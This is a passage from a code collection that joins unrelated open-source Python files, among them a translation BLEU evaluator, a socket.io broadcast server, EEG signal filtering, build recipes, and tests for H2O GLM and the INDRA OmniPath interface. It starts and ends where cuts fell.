Translator runs validation on test dataset, executes inference, optionally
computes BLEU score using sacrebleu.
"""
def __init__(self,
model,
tokenizer,
loader,
beam_size=5,
len_norm_factor=0.6,
len_norm_const=5.0,
cov_penalty_factor=0.1,
max_seq_len=50,
cuda=False,
print_freq=1,
dataset_dir=None,
save_path=None,
target_bleu=None):
self.model = model
self.tokenizer = tokenizer
self.loader = loader
self.insert_target_start = [config.BOS]
self.insert_src_start = [config.BOS]
self.insert_src_end = [config.EOS]
self.batch_first = model.batch_first
self.cuda = cuda
self.beam_size = beam_size
self.print_freq = print_freq
self.dataset_dir = dataset_dir
self.target_bleu = target_bleu
self.save_path = save_path
self.distributed = (get_world_size() > 1)
self.generator = SequenceGenerator(
model=self.model,
beam_size=beam_size,
max_seq_len=max_seq_len,
cuda=cuda,
len_norm_factor=len_norm_factor,
len_norm_const=len_norm_const,
cov_penalty_factor=cov_penalty_factor)
def build_eval_path(self, epoch, iteration):
"""
Appends index of the current epoch and index of the current iteration
to the name of the file with results.
:param epoch: index of the current epoch
:param iteration: index of the current iteration
"""
if iteration is not None:
eval_fname = f'eval_epoch_{epoch}_iter_{iteration}'
else:
eval_fname = f'eval_epoch_{epoch}'
eval_path = os.path.join(self.save_path, eval_fname)
return eval_path
def run(self, calc_bleu=True, epoch=None, iteration=None, eval_path=None,
summary=False, reference_path=None):
"""
Runs translation on test dataset.
:param calc_bleu: if True compares results with reference and computes
BLEU score
:param epoch: index of the current epoch
:param iteration: index of the current iteration
:param eval_path: path to the file for saving results
:param summary: if True prints summary
:param reference_path: path to the file with reference translation
"""
if self.cuda:
test_bleu = torch.cuda.FloatTensor([0])
break_training = torch.cuda.LongTensor([0])
else:
test_bleu = torch.FloatTensor([0])
break_training = torch.LongTensor([0])
if eval_path is None:
eval_path = self.build_eval_path(epoch, iteration)
detok_eval_path = eval_path + '.detok'
with contextlib.suppress(FileNotFoundError):
os.remove(eval_path)
os.remove(detok_eval_path)
rank = get_rank()
logging.info(f'Running evaluation on test set')
self.model.eval()
torch.cuda.empty_cache()
output = self.evaluate(epoch, iteration, summary)
output = output[:len(self.loader.dataset)]
output = self.loader.dataset.unsort(output)
if rank == 0:
with open(eval_path, 'a') as eval_file:
eval_file.writelines(output)
if calc_bleu:
self.run_detokenizer(eval_path)
test_bleu[0] = self.run_sacrebleu(detok_eval_path, reference_path)
if summary:
logging.info(f'BLEU on test dataset: {test_bleu[0]:.2f}')
if self.target_bleu and test_bleu[0] >= self.target_bleu:
logging.info(f'Target accuracy reached')
break_training[0] = 1
barrier()
torch.cuda.empty_cache()
logging.info(f'Finished evaluation on test set')
if self.distributed:
dist.broadcast(break_training, 0)
dist.broadcast(test_bleu, 0)
return test_bleu[0].item(), break_training[0].item()
def evaluate(self, epoch, iteration, summary):
"""
Runs evaluation on test dataset.
:param epoch: index of the current epoch
:param iteration: index of the current iteration
:param summary: if True prints summary
"""
batch_time = AverageMeter(False)
tot_tok_per_sec = AverageMeter(False)
iterations = AverageMeter(False)
enc_seq_len = AverageMeter(False)
dec_seq_len = AverageMeter(False)
stats = {}
output = []
for i, (src, indices) in enumerate(self.loader):
translate_timer = time.time()
src, src_length = src
batch_size = self.loader.batch_size
global_batch_size = batch_size * get_world_size()
beam_size = self.beam_size
bos = [self.insert_target_start] * (batch_size * beam_size)
bos = torch.LongTensor(bos)
if self.batch_first:
bos = bos.view(-1, 1)
else:
bos = bos.view(1, -1)
src_length = torch.LongTensor(src_length)
stats['total_enc_len'] = int(src_length.sum())
if self.cuda:
src = src.cuda()
src_length = src_length.cuda()
bos = bos.cuda()
with torch.no_grad():
context = self.model.encode(src, src_length)
context = [context, src_length, None]
if beam_size == 1:
generator = self.generator.greedy_search
else:
generator = self.generator.beam_search
preds, lengths, counter = generator(batch_size, bos, context)
stats['total_dec_len'] = lengths.sum().item()
stats['iters'] = counter
indices = torch.tensor(indices).to(preds)
preds = preds.scatter(0, indices.unsqueeze(1).expand_as(preds), preds)
preds = gather_predictions(preds).cpu()
for pred in preds:
pred = pred.tolist()
detok = self.tokenizer.detokenize(pred)
output.append(detok + '\n')
elapsed = time.time() - translate_timer
batch_time.update(elapsed, batch_size)
total_tokens = stats['total_dec_len'] + stats['total_enc_len']
ttps = total_tokens / elapsed
tot_tok_per_sec.update(ttps, batch_size)
iterations.update(stats['iters'])
enc_seq_len.update(stats['total_enc_len'] / batch_size, batch_size)
dec_seq_len.update(stats['total_dec_len'] / batch_size, batch_size)
if i % self.print_freq == 0:
log = []
log += f'TEST '
if epoch is not None:
log += f'[{epoch}]'
if iteration is not None:
log += f'[{iteration}]'
log += f'[{i}/{len(self.loader)}]\t'
log += f'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
log += f'Decoder iters {iterations.val:.1f} ({iterations.avg:.1f})\t'
log += f'Tok/s {tot_tok_per_sec.val:.0f} ({tot_tok_per_sec.avg:.0f})'
log = ''.join(log)
logging.info(log)
tot_tok_per_sec.reduce('sum')
enc_seq_len.reduce('mean')
dec_seq_len.reduce('mean')
batch_time.reduce('mean')
iterations.reduce('sum')
if summary and get_rank() == 0:
time_per_sentence = (batch_time.avg / global_batch_size)
log = []
log += f'TEST SUMMARY:\n'
log += f'Lines translated: {len(self.loader.dataset)}\t'
log += f'Avg total tokens/s: {tot_tok_per_sec.avg:.0f}\n'
log += f'Avg time per batch: {batch_time.avg:.3f} s\t'
log += f'Avg time per sentence: {1000*time_per_sentence:.3f} ms\n'
log += f'Avg encoder seq len: {enc_seq_len.avg:.2f}\t'
log += f'Avg decoder seq len: {dec_seq_len.avg:.2f}\t'
log += f'Total decoder iterations: {int(iterations.sum)}'
log = ''.join(log)
logging.info(log)
return output
def run_detokenizer(self, eval_path):
"""
Executes moses detokenizer on eval_path file and saves result to
eval_path + ".detok" file.
:param eval_path: path to the tokenized input
"""
logging.info('Running detokenizer')
detok_path = os.path.join(self.dataset_dir, config.DETOKENIZER)
detok_eval_path = eval_path + '.detok'
with open(detok_eval_path, 'w') as detok_eval_file, \
open(eval_path, 'r') as eval_file:
subprocess.run(['perl', f'{detok_path}'], stdin=eval_file,
stdout=detok_eval_file, stderr=subprocess.DEVNULL)
def run_sacrebleu(self, detok_eval_path, reference_path):
"""
Executes sacrebleu and returns BLEU score.
:param detok_eval_path: path to the test file
:param reference_path: path to the reference file
"""
if reference_path is None:
reference_path = os.path.join(self.dataset_dir,
config.TGT_TEST_TARGET_FNAME)
sacrebleu_params = '--score-only -lc --tokenize intl'
logging.info(f'Running sacrebleu (parameters: {sacrebleu_params})')
sacrebleu = subprocess.run([f'sacrebleu --input {detok_eval_path} \
{reference_path} {sacrebleu_params}'],
stdout=subprocess.PIPE, shell=True)
test_bleu = float(sacrebleu.stdout.strip())
return test_bleu
|
servers/docker-python/nohandler/server_app.py | veaba/ncov | 288 | 11097276 | import json
import socketio
from aiohttp import web
# from socket_app import socket_app
from mongo import update_news, query_list
sio = socketio.AsyncServer(cors_allowed_origins='*')
app = web.Application()
sio.attach(app)
async def index(request):
return web.Response(text="Hello Python socket.io", content_type="text/html")
# Connection event
@sio.event
def connect(sid, environ):
pass
# print('connect_sid', sid)
# print('connect_environ', environ)
# Global 'message' handler
# @sio.on('message')
# async def print_message(sid, message):
# # When we receive a new event of type
# # 'message' through a socket.io connection
# # we print the socket ID and the message
# print("Socket ID: ", sid)
# print(111, message)
@sio.on('hello')
async def print_hello(sid, message):
print(222, message)
# time.sleep(2)
    # await sio.emit('my_message', {'response': 'haha, got it'})  # this works -- but how do we push messages proactively?
# TODO: broadcast messages
@sio.event
async def emit_broadcast():
    data = "A message sent from the server"
    print('broadcast handler executed')
await sio.emit('broadcast', {'xxx': data})
@sio.event
async def my_broadcast_event(sid, message):
print(3333, sid, message)
# await sio.emit('my_response', {'data': message['data']})
# TODO: Weibo messages
# We bind our aiohttp endpoint to our app
# router
# Disconnect event
@sio.event
def disconnect(sid):
pass
# print('disconnect: ', sid)
async def background_task():
while True:
        # Every minute: read the first 20 records from the database, pick out the not-yet-marked ones, mark them, and write them back
await sio.sleep(5)
news_list = query_list('broadcast')
        # Data to broadcast
broadcast_list = [item for item in json.loads(news_list) if 'is_read' not in item]
await sio.emit('my_response', {'code': 0, 'data': broadcast_list})
for item in broadcast_list:
print(item)
# item['_id'] = item['_id']['$oid']
del item['_id']
item['is_read'] = 1
print('1111=>',item)
update_news(item, 'broadcast')
app.router.add_get('/', index)
async def xx():
while True:
await sio.sleep(2)
await sio.emit('my_response', {'x': 44})
def server_app(application):
sio.start_background_task(background_task)
web.run_app(application)
# We kick off our server
if __name__ == '__main__':
server_app(app)
|
h2o-py/tests/testdir_algos/glm/pyunit_glm_regularization_path.py | ahmedengu/h2o-3 | 6,098 | 11097296 | import sys
sys.path.insert(1,"../../../")
import h2o
from builtins import range
from tests import pyunit_utils
from h2o.estimators.glm import H2OGeneralizedLinearEstimator as glm
def reg_path_glm():
# read in the dataset and construct training set (and validation set)
d = h2o.import_file(path=pyunit_utils.locate("smalldata/logreg/prostate.csv"))
m = glm(family='binomial',lambda_search=True,solver='COORDINATE_DESCENT')
m.train(training_frame=d,x=[2,3,4,5,6,7,8],y=1)
r = glm.getGLMRegularizationPath(m)
m2 = glm.makeGLMModel(model=m,coefs=r['coefficients'][10])
dev1 = r['explained_deviance_train'][10]
p = m2.model_performance(d)
dev2 = 1-p.residual_deviance()/p.null_deviance()
print(dev1," =?= ",dev2)
assert abs(dev1 - dev2) < 1e-6
for l in range(0,len(r['lambdas'])):
m = glm(family='binomial',lambda_search=False,Lambda=r['lambdas'][l],solver='COORDINATE_DESCENT')
m.train(training_frame=d,x=[2,3,4,5,6,7,8],y=1)
cs = r['coefficients'][l]
cs_norm = r['coefficients_std'][l]
diff = 0
diff2 = 0
for n in cs.keys():
diff = max(diff,abs((cs[n] - m.coef()[n])))
diff2 = max(diff2,abs((cs_norm[n] - m.coef_norm()[n])))
print(diff)
print(diff2)
assert diff < 1e-2
assert diff2 < 1e-2
p = m.model_performance(d)
devm = 1-p.residual_deviance()/p.null_deviance()
devn = r['explained_deviance_train'][l]
print(devm)
print(devn)
assert abs(devm - devn) < 1e-4
if __name__ == "__main__":
pyunit_utils.standalone_test(reg_path_glm)
else:
reg_path_glm()
|
learning_python/modules/collateral/module_basics/use_module2b.py | fallenfuzz/pynet | 528 | 11097349 | from my_module2 import dns_ip
dns_ip()
dns_ip(dns="1.1.1.1")
|
tools/SDKTool/src/ui/tree/ai_tree/action_rain_bow_data.py | Passer-D/GameAISDK | 1,210 | 11097352 | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making GameAISDK available.
This source code file is licensed under the GNU General Public License Version 3.
For full details, please refer to the file "LICENSE.txt" which is provided as part of this source code package.
Copyright (C) 2020 THL A29 Limited, a Tencent company. All rights reserved.
"""
import logging
from .action_dqn_data import DqnActionData
from ....config_manager.ai.ai_manager import AIManager, AIAlgorithmType
logger = logging.getLogger("sdktool")
class RainBowActionData(DqnActionData):
def __init__(self):
ai_mgr = AIManager()
self.__game_action = ai_mgr.get_game_action(3)
self.__ai_action = ai_mgr.get_ai_action(3)
@staticmethod
def get_game_action_inner():
return AIManager().get_game_action(AIAlgorithmType.RAINBOW)
@staticmethod
def get_ai_action_inner():
return AIManager().get_ai_action(AIAlgorithmType.RAINBOW)
|
eeg_modelling/eeg_viewer/waveform_data_service.py | deepneuralmachine/google-research | 23,901 | 11097362 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Contains methods for packaging data from a DataSource for the API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import logging
import numpy as np
from scipy import signal
from eeg_modelling.eeg_viewer import utils
from eeg_modelling.pyprotos import data_pb2
# The double banana refers to a common montage used to display EEG data.
# Each tuple represents a 'standard' in the montage, which is a subtraction of
# the signals from two EEG leads placed on the scalp.
# Elements containing '|' allow for differences in lead naming conventions
# between datasets.
_DOUBLE_BANANA = [('FP1', 'F7'), ('F7', 'T3|T7'), ('T3|T7', 'T5|P7'),
('T5|P7', 'O1'),
('FP2', 'F8'), ('F8', 'T4|T8'), ('T4|T8', 'T6|P8'),
('T6|P8', 'O2'),
('FP1', 'F3'), ('F3', 'C3'), ('C3', 'P3'), ('P3', 'O1'),
('FP2', 'F4'), ('F4', 'C4'), ('C4', 'P4'), ('P4', 'O2'),
('FZ', 'CZ'), ('CZ', 'PZ'),
('EKG1', 'EKG2')]
# The standard set of leads for a 12 lead ECG
_ECG_12_LEAD = [('I',), ('II',), ('III',), ('AVR',), ('AVL',), ('AVF',),
('V1',), ('V2',), ('V3',), ('V4',), ('V5',), ('V6',)]
def _FilterData(row_data, index, data_source, low_cut, high_cut, notch):
"""Runs full segment data through low and high pass filters.
Args:
row_data: Full segment data for a single channel.
index: The index for a single channel.
data_source: The DataSource for the waveform data.
low_cut: lower frequency to apply a band-pass filter.
high_cut: higher frequency to apply a band-pass filter.
notch: frequency to apply a notch filter.
Returns:
Filtered input row data.
"""
nyquist_freq = data_source.GetChannelSamplingFrequency(index) / 2
low_val = low_cut / nyquist_freq
high_val = high_cut / nyquist_freq
notch_val = notch / nyquist_freq
pad_len = int(nyquist_freq) if int(nyquist_freq) else 1
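  # Symmetrically pad with ~0.5 s of samples to limit edge artifacts from the
  # IIR filters below; the padding is stripped again before returning.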
padded_data = np.pad(row_data, (pad_len, pad_len), 'symmetric')
if low_val > 0 and low_val < 1:
# Using a 1st-order forward pass filter to match NK viewer
b, a = signal.butter(1, [low_val], btype='high', analog=False)
padded_data = signal.lfilter(b, a, padded_data)
if high_val > 0 and high_val < 1:
# Using a 1st-order forward pass filter to match NK viewer
b, a = signal.butter(1, [high_val], btype='low', analog=False)
padded_data = signal.lfilter(b, a, padded_data)
if notch_val > 0 and notch_val < 1:
b, a = signal.iirnotch(notch_val, 30)
padded_data = signal.lfilter(b, a, padded_data)
return padded_data[pad_len:-pad_len]
def _GetChannelIndicesInChannelDataIdList(id_list):
"""Returns a list of all the unique channel indices requested."""
channel_indices = []
for ch in id_list:
if ch.HasField('bipolar_channel'):
request_indices = [
ch.bipolar_channel.index, ch.bipolar_channel.referential_index
]
else:
request_indices = [ch.single_channel.index]
channel_indices = channel_indices + request_indices
return list(set(channel_indices))
def _CreateChannelData(data_source,
channel_data_ids,
low_cut,
high_cut,
notch,
start=0,
duration=None,
max_samples=None):
"""Returns a list of channel names and a dictionary of their values.
Args:
data_source: The DataSource for the waveform data.
channel_data_ids: ChannelDataIds list.
low_cut: lower frequency to apply a band-pass filter.
high_cut: higher frequency to apply a band-pass filter.
notch: frequency to apply a notch filter.
start: start time to crop the data, relative to the start of the file (in
seconds). Defaults to the start of the file.
duration: duration to crop from the data, in seconds. If None, will get the
whole file data.
max_samples: The maximum number of samples in one channel response.
If None, there is no maximum limit.
Returns:
A dictionary of channel names mapped to the requested time slice of their
data and an ordered list of the channel names.
Raises:
ValueError: Too many feature keys provided (only handles raw features or
subtraction of two features).
"""
if duration is None:
duration = data_source.GetLength()
channel_indices = _GetChannelIndicesInChannelDataIdList(channel_data_ids)
single_channel_data = data_source.GetChannelData(
channel_indices, start, duration)
subsampling = 1 if max_samples is None else utils.GetSubsamplingRate(
len(list(single_channel_data.values())[0]), max_samples)
def _GetFilteredData(index):
"""Wrapper to call _FilterData function.
Args:
index: the index for the selected channel.
Returns:
Filtered data for the selected channel.
"""
return _FilterData(single_channel_data[str(index)],
index,
data_source,
low_cut,
high_cut,
notch)
req_channel_data = {}
channel_names = []
for channel_data_id in channel_data_ids:
if channel_data_id.HasField('bipolar_channel'):
primary_index = channel_data_id.bipolar_channel.index
primary_data = _GetFilteredData(primary_index)
ref_index = channel_data_id.bipolar_channel.referential_index
ref_data = _GetFilteredData(ref_index)
channel_data = [reference - primary for (primary, reference) in
zip(primary_data, ref_data)]
channel_name = '-'.join(data_source.GetChannelName(index)
for index in [primary_index, ref_index])
elif channel_data_id.HasField('single_channel'):
index = channel_data_id.single_channel.index
channel_data = _GetFilteredData(index)
channel_name = data_source.GetChannelName(index)
else:
      raise ValueError('Unfamiliar channel type %s' % channel_data_id)
req_channel_data[channel_name] = channel_data[::subsampling]
channel_names.append(channel_name)
return req_channel_data, channel_names
def _AddDataTableSeries(channel_data, output_data):
"""Adds series to the DataTable inputs.
Args:
channel_data: A dictionary of channel names to their data. Each value in
the dictionary has the same sampling frequency and the same time slice.
output_data: Current graph data for DataTable API.
Returns:
The edited output_data dictionary where the first index represents the
time axis value and the second the series value.
"""
for i in range(len(list(channel_data.values())[0])):
output_data[i].update({channel_name: data[i]
for channel_name, data in channel_data.items()})
return output_data
def GetSamplingFrequency(data_source, channel_data_ids):
"""Returns the sampling frequency for a group of channels.
Args:
data_source: DataSource instance.
channel_data_ids: Channels to get the sampling freq from.
Returns:
Sampling frequency for all the channels (must be the same).
"""
channel_indices = _GetChannelIndicesInChannelDataIdList(channel_data_ids)
return data_source.GetSamplingFrequency(channel_indices)
def _CreateChunkDataTableJSon(data_source, request, max_samples):
"""Creates a DataTable in JSON format which contains the data specified.
Data can be specified by a list of minuends and subtrahends of montage
standards and/or a list of channel keys.
Args:
data_source: The DataSource for the waveform data.
request: A DataRequest proto instance.
max_samples: The maximum number of samples in one channel response.
Returns:
JSON format DataTable loaded with montage data.
Raises:
ValueError: The requested channels have multiple frequency types.
"""
sample_freq = GetSamplingFrequency(data_source, request.channel_data_ids)
# Initialize Dygraph data with a time axis of sampling frequency.
output_data, _ = utils.InitDataTableInputsWithTimeAxis(
sample_freq, request.chunk_duration_secs, request.chunk_start,
max_samples)
columns_order = ['seconds']
channel_data, channel_names = _CreateChannelData(
data_source,
request.channel_data_ids,
request.low_cut,
request.high_cut,
request.notch,
start=request.chunk_start,
duration=request.chunk_duration_secs,
max_samples=max_samples)
output_data = _AddDataTableSeries(channel_data, output_data)
columns_order.extend(channel_names)
return (utils.ConvertToDataTableJSon(output_data, columns_order),
sample_freq)
def GetMetadata(data_source, max_samples):
"""Returns metadata consistent across the predictions.
Args:
data_source: The DataSource for the waveform data.
max_samples: The maximum number of samples in one channel response.
Returns:
A PredictionMetadata instance filled with PredictionOutput data.
"""
response = data_pb2.WaveformMetadata()
response.abs_start = data_source.GetStartTime()
response.labels.extend(data_source.GetAnnotations())
for index, channel in data_source.GetChannelIndexDict().iteritems():
response.channel_dict[index] = channel
response.file_type = data_source.GetFileType()
response.nav_timeline_datatable = utils.CreateEmptyTable(
data_source.GetLength(), max_samples)
response.num_secs = data_source.GetLength()
response.patient_id = data_source.GetPatientId()
response.sstable_key = data_source.GetFileKey()
return response
def _GetChannelIndexFromNameOptions(channel_opts, data_source):
indices = [data_source.GetChannelIndexFromName(opt)
for opt in channel_opts.split('|')
if data_source.GetChannelIndexFromName(opt)]
return indices[0] if indices else None
def _GetChannelDataIdFromNameOptions(channel_name, data_source):
"""Creates a ChannelDataId for a channel name string with name options.
Sometimes channel naming conventions for the same electrode placement vary
between institutions, so the options allow us to cover all cases.
Args:
channel_name: A tuple of strings with channel name options joined on '|'.
data_source: The DataSource for the waveform data.
Returns:
A ChannelDataId filled out with the indices for the given name tuple.
"""
channel_id = None
if len(channel_name) == 2:
primary_index = _GetChannelIndexFromNameOptions(channel_name[0],
data_source)
ref_index = _GetChannelIndexFromNameOptions(channel_name[1], data_source)
if primary_index is not None and ref_index is not None:
channel_id = data_pb2.ChannelDataId()
channel_id.bipolar_channel.index = int(primary_index)
channel_id.bipolar_channel.referential_index = int(ref_index)
if len(channel_name) == 1:
index = _GetChannelIndexFromNameOptions(channel_name[0], data_source)
if index is not None:
channel_id = data_pb2.ChannelDataId()
channel_id.single_channel.index = int(index)
return channel_id
def _GetDefaultChannelDataIdList(data_source):
"""Returns the list of default features when a request does not specify.
When a data request is made for the first time with a set of file
parameters, the client does not have the lookup table with the channel
indices, therefore the client cannot specify channels until after the
initial load. To deal with this case, when no channel indices are provided,
we generate a list of channel indices using the lookup table and default
channel requests that are hardcoded for each medical waveform data type.
Those channel indices will be used as the request indices.
Args:
data_source: The DataSource for the waveform data.
"""
default_channel_names = []
if data_source.GetFileType() == 'EEG':
default_channel_names = _DOUBLE_BANANA
elif (data_source.GetFileType() == 'EKG' or
data_source.GetFileType() == 'ECG'):
default_channel_names = _ECG_12_LEAD
default_channel_ids = [_GetChannelDataIdFromNameOptions(x, data_source)
for x in default_channel_names]
return [channel_id for channel_id in default_channel_ids if channel_id]
def GetChunk(data_source, request, max_samples):
"""Returns all graph data for current chunk.
Args:
data_source: The DataSource for the waveform data.
request: A DataRequest proto instance.
max_samples: The maximum number of samples in one channel response.
Returns:
A WaveformChunkResponse specified by the Request proto.
Raises:
ValueError: If chunk duration is not a positive integer.
"""
if (request.chunk_start >= data_source.GetLength() or
request.chunk_start + request.chunk_duration_secs <= 0):
raise ValueError('Chunk starting at %s is out of bounds'
% request.chunk_start)
if not request.channel_data_ids:
default_channels = _GetDefaultChannelDataIdList(data_source)
logging.info('Loading default channels')
request.channel_data_ids.extend(default_channels)
response = data_pb2.WaveformChunk()
waveform_datatable, sampling_freq = _CreateChunkDataTableJSon(data_source,
request,
max_samples)
response.waveform_datatable = waveform_datatable
response.sampling_freq = sampling_freq
response.channel_data_ids.extend(request.channel_data_ids)
return response
def GetChunkDataAsNumpy(data_source,
channel_data_ids,
low_cut,
high_cut,
notch):
"""Extract data from a data source as a numpy array.
Args:
data_source: A DataSource instance.
channel_data_ids: ChannelDataIds list.
low_cut: lower frequency to apply a band-pass filter.
high_cut: higher frequency to apply a band-pass filter.
notch: frequency to apply a notch filter.
Returns:
Numpy array of shape (n_channels, n_data) with the waveform data.
"""
channel_data, channel_names = _CreateChannelData(data_source,
channel_data_ids, low_cut,
high_cut, notch)
data = [channel_data[channel_name] for channel_name in channel_names]
data = np.array(data, dtype=np.float32)
return data
|
docs/conf.py | Leanny/mmpy_bot | 196 | 11097363 | # -*- coding: utf-8 -*-
import os
from mmpy_bot import __version__
os.environ["DJANGO_SETTINGS_MODULE"] = "settings"
extensions = ["sphinx.ext.autodoc", "sphinx.ext.todo"]
templates_path = ["_templates"]
source_suffix = ".rst"
master_doc = "index"
project = "mmpy_bot"
copyright = "2016, "
version = __version__
release = __version__
exclude_patterns = []
pygments_style = "sphinx"
html_theme = "default"
htmlhelp_basename = "mmpy_botdoc"
latex_documents = [
("index", "mmpy_bot.tex", "mmpy_bot Documentation", "", "manual"),
]
man_pages = [("index", "mmpy_bot", "mmpy_bot Documentation", ["gotlium"], 1)]
texinfo_documents = [
(
"index",
"mmpy_bot",
"Mattermost-bot Documentation",
"gotlium",
"mmpy_bot",
"One line description of project.",
"Miscellaneous",
),
]
|
recipes/opencore-amr/all/conanfile.py | rockandsalt/conan-center-index | 562 | 11097378 | <gh_stars>100-1000
from conans import ConanFile, AutoToolsBuildEnvironment, tools
from contextlib import contextmanager
import os
required_conan_version = ">=1.33.0"
class OpencoreAmrConan(ConanFile):
name = "opencore-amr"
homepage = "https://sourceforge.net/projects/opencore-amr/"
description = "OpenCORE Adaptive Multi Rate (AMR) speech codec library implementation."
topics = ("audio-codec", "amr", "opencore")
url = "https://github.com/conan-io/conan-center-index"
license = "Apache-2.0"
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
}
_autotools = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _settings_build(self):
return getattr(self, "settings_build", self.settings)
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
def build_requirements(self):
if self._settings_build.os == "Windows" and not tools.get_env("CONAN_BASH_PATH"):
self.build_requires("msys2/cci.latest")
if self.settings.compiler == "Visual Studio":
self.build_requires("automake/1.16.4")
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
@contextmanager
def _build_context(self):
if self.settings.compiler == "Visual Studio":
with tools.vcvars(self):
env = {
"CC": "cl -nologo",
"CXX": "cl -nologo",
"LD": "link -nologo",
"AR": "{} lib".format(tools.unix_path(self.deps_user_info["automake"].ar_lib)),
}
with tools.environment_append(env):
yield
else:
yield
def _configure_autotools(self):
if self._autotools:
return self._autotools
self._autotools = AutoToolsBuildEnvironment(self, win_bash=tools.os_info.is_windows)
yes_no = lambda v: "yes" if v else "no"
args = [
"--enable-shared={}".format(yes_no(self.options.shared)),
"--enable-static={}".format(yes_no(not self.options.shared)),
]
if self.settings.compiler == "Visual Studio":
self._autotools.cxx_flags.append("-EHsc")
if tools.Version(self.settings.compiler.version) >= "12":
self._autotools.flags.append("-FS")
self._autotools.configure(args=args, configure_dir=self._source_subfolder)
return self._autotools
def build(self):
with self._build_context():
self._configure_autotools()
self._autotools.make()
def package(self):
self._autotools.install()
self.copy("LICENSE", dst="licenses", src=self._source_subfolder)
tools.remove_files_by_mask(os.path.join(self.package_folder, "lib"), "*.la")
tools.rmdir(os.path.join(self.package_folder, "lib", "pkgconfig"))
if self.settings.compiler == "Visual Studio" and self.options.shared:
for lib in ("opencore-amrwb", "opencore-amrnb"):
tools.rename(os.path.join(self.package_folder, "lib", "{}.dll.lib".format(lib)),
os.path.join(self.package_folder, "lib", "{}.lib".format(lib)))
def package_info(self):
for lib in ("opencore-amrwb", "opencore-amrnb"):
self.cpp_info.components[lib].names["pkg_config"] = lib
self.cpp_info.components[lib].libs = [lib]
|
samples/python/logpolar.py | thisisgopalmandal/opencv | 56,632 | 11097390 | <reponame>thisisgopalmandal/opencv<gh_stars>1000+
#!/usr/bin/env python
'''
plots image as logPolar and linearPolar
Usage:
logpolar.py
Keys:
ESC - exit
'''
# Python 2/3 compatibility
from __future__ import print_function
import numpy as np
import cv2 as cv
def main():
import sys
try:
fn = sys.argv[1]
except IndexError:
fn = 'fruits.jpg'
img = cv.imread(cv.samples.findFile(fn))
if img is None:
print('Failed to load image file:', fn)
sys.exit(1)
img2 = cv.logPolar(img, (img.shape[0]/2, img.shape[1]/2), 40, cv.WARP_FILL_OUTLIERS)
img3 = cv.linearPolar(img, (img.shape[0]/2, img.shape[1]/2), 40, cv.WARP_FILL_OUTLIERS)
cv.imshow('before', img)
cv.imshow('logpolar', img2)
cv.imshow('linearpolar', img3)
cv.waitKey(0)
print('Done')
if __name__ == '__main__':
print(__doc__)
main()
cv.destroyAllWindows()
|
underworld/libUnderworld/config/packages/libm.py | longgangfan/underworld2 | 116 | 11097394 | from config import Package
class libm(Package):
def gen_locations(self):
yield ('/usr/local', ['/usr/local'], ['/usr/local'])
def gen_envs(self, loc):
for env in Package.gen_envs(self, loc):
self.headers = ['math.h']
if self.find_libraries(loc[2], 'm'):
env.PrependUnique(LIBS=['m'])
yield env
|
indra/tests/test_omnipath.py | zebulon2/indra | 136 | 11097421 | <reponame>zebulon2/indra
import requests
from indra.sources.omnipath import OmniPathProcessor
from indra.sources.omnipath.api import op_url
from indra.statements import Agent
from indra.ontology.standardize import standardize_agent_name
BRAF_UPID = 'P15056'
JAK2_UPID = 'O60674'
CALM1_UPID = 'P0DP23'
TRPC3_UPID = 'Q13507'
BRAF_AG = Agent(None, db_refs={'UP': BRAF_UPID})
standardize_agent_name(BRAF_AG)
JAK2_AG = Agent(None, db_refs={'UP': JAK2_UPID})
standardize_agent_name(JAK2_AG)
CALM1_AG = Agent(None, db_refs={'UP': CALM1_UPID})
standardize_agent_name(CALM1_AG)
TRPC3_AG = Agent(None, db_refs={'UP': TRPC3_UPID})
standardize_agent_name(TRPC3_AG)
def test_omnipath_web_api():
query_url = '%s/queries' % op_url
res = requests.get(query_url)
assert res.status_code == 200
def test_mods_from_web():
params = {'format': 'json', 'substrates': JAK2_UPID,
'fields': ['sources', 'references']}
ptm_url = '%s/ptms' % op_url
res = requests.get(ptm_url, params=params)
assert res.status_code == 200
assert res.text
ptm_json = res.json()
assert ptm_json[0]['substrate'] == JAK2_UPID, ptm_json[0]['substrate']
op = OmniPathProcessor(ptm_json=ptm_json)
op.process_ptm_mods()
stmts = op.statements
assert JAK2_AG.name in [a.name for a in stmts[0].agent_list()],\
stmts[0].agent_list()
assert 'omnipath' == stmts[0].evidence[0].source_api,\
stmts[0].evidence[0].source_api
def test_ligrec_from_web():
params = {'format': 'json', 'datasets': ['ligrecextra'],
'fields': ['curation_effort', 'entity_type', 'references',
'resources', 'sources', 'type'],
'sources': [CALM1_UPID]}
query_url = '%s/interactions' % op_url
res = requests.get(query_url, params)
assert res.status_code == 200
assert res.text
assert 'error' not in res.text.lower()
ligrec_json = res.json()
assert ligrec_json[0]['source'] == CALM1_UPID
op = OmniPathProcessor(ligrec_json=ligrec_json)
op.process_ligrec_interactions()
stmts = op.statements
assert CALM1_AG.name in [a.name for a in stmts[0].agent_list()], \
stmts[0].agent_list()
assert 'omnipath' == stmts[0].evidence[0].source_api,\
stmts[0].evidence[0].source_api
|
brew/metrics/evaluation.py | va26/brew | 344 | 11097437 | import numpy as np
import sklearn
import sklearn.metrics
class Evaluator(object):
def __init__(self, metric='auc'):
if metric == 'auc':
self.metric = auc_score
elif metric == 'acc':
self.metric = acc_score
def calculate(self, y_true, y_pred):
return self.metric(y_true, y_pred)
def auc_score(y_true, y_pred, positive_label=1):
if hasattr(sklearn.metrics, 'roc_auc_score'):
return sklearn.metrics.roc_auc_score(y_true, y_pred)
fp_rate, tp_rate, thresholds = sklearn.metrics.roc_curve(
